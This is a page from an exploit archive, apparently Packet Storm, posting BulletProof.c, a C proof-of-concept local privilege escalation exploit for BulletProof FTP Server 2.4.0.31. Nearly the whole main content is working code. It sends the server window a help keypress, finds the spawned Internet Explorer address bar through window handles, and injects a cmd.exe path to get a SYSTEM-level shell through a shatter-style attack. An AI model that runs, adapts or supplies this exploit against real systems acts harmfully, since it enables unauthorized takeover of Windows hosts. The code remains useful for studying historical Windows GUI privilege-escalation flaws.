exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

BulletProof.c

BulletProof.c
Posted May 27, 2005
Authored by Jerome Athias, Reed Arvin | Site reedarvin.thearvins.com

BulletProof FTP server version 2.4.0.31 local privilege escalation exploit that provides a shell with SYSTEM privileges.

tags | exploit, shell, local
SHA-256 | bf0d2a596e4873cd8286ec7287c3700d618e721578db84e1ee1695e7faedd485

BulletProof.c

Change Mirror Download
//********************************************************
//Privilege escalation in BulletProof FTP Server v2.4.0.31
//By Jerome Athias
//jerome DOT athias AT free DOT fr
//Discovered by Reed Arvin reedarvin[at]gmail[dot]com
//(http://reedarvin.thearvins.com)
//
//Little PoC
//Gives you a shell with system privileges
//********************************************************

#include "stdio.h"
#include "windows.h"

int main(int argc, char* argv[])
{
HWND lHandle, lHandle2;
char sText[]="%windir%\\system32\\cmd.exe";
char buffer[256];

lHandle=FindWindow(NULL, "BulletProof FTP Server v2.4.0.31");
if (!lHandle)
{
printf("\nUsage :\nBulletProof FTP Server v2.4.0.31 doesn't seem to run?\n");
return 0;
}
else
{
printf("handle for BulletProof : 0x%X\n",lHandle);
}
SetForegroundWindow(lHandle);

SendMessage(lHandle, WM_IME_KEYDOWN, VK_F1, 0); //send F1 key "help me please!"
Sleep(5000); //I need this time to drink a beer ;P

//Find the browser Handle
//lHandle2=FindWindow(NULL, "BPFTP Server - Mozilla Firefox");
//if (!lHandle2)
//{
lHandle2=FindWindow("IEFrame", "BPFTP Server - Microsoft Internet Explorer");
lHandle2=FindWindowEx(NULL, NULL, "IEFrame", NULL);

printf("handle for IE : 0x%X\n",lHandle2);
if (!lHandle2)
{
printf("\nError while finding the browser's window.\n");
}
//}
//else
//{
// printf("handle for Firefox : 0x%X\n",lHandle2);
//}
SetForegroundWindow(lHandle2);

lHandle=FindWindowEx(lHandle2, 0, "WorkerW", 0);
if (lHandle>=0)
{
lHandle = FindWindowEx(lHandle, 0, "ReBarWindow32", 0);
if (lHandle>=0)
{
//Where are you Charlie...
lHandle = FindWindowEx(lHandle, 0, "ComboBoxEx32", 0);
lHandle = FindWindowEx(lHandle, 0, "ComboBox", 0);
lHandle = FindWindowEx(lHandle, 0, "Edit", 0);
}
}
else
{
printf("\nerror :-(\n");
}

SendMessage(lHandle, WM_SETFOCUS, 0, 0);
Sleep(300);
SendMessage(lHandle, WM_SETTEXT, 0, (LPARAM) sText);
//Shatter!
PostMessage(lHandle, WM_KEYDOWN, VK_RETURN, 0);
//whoami? :-)

return 0;
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close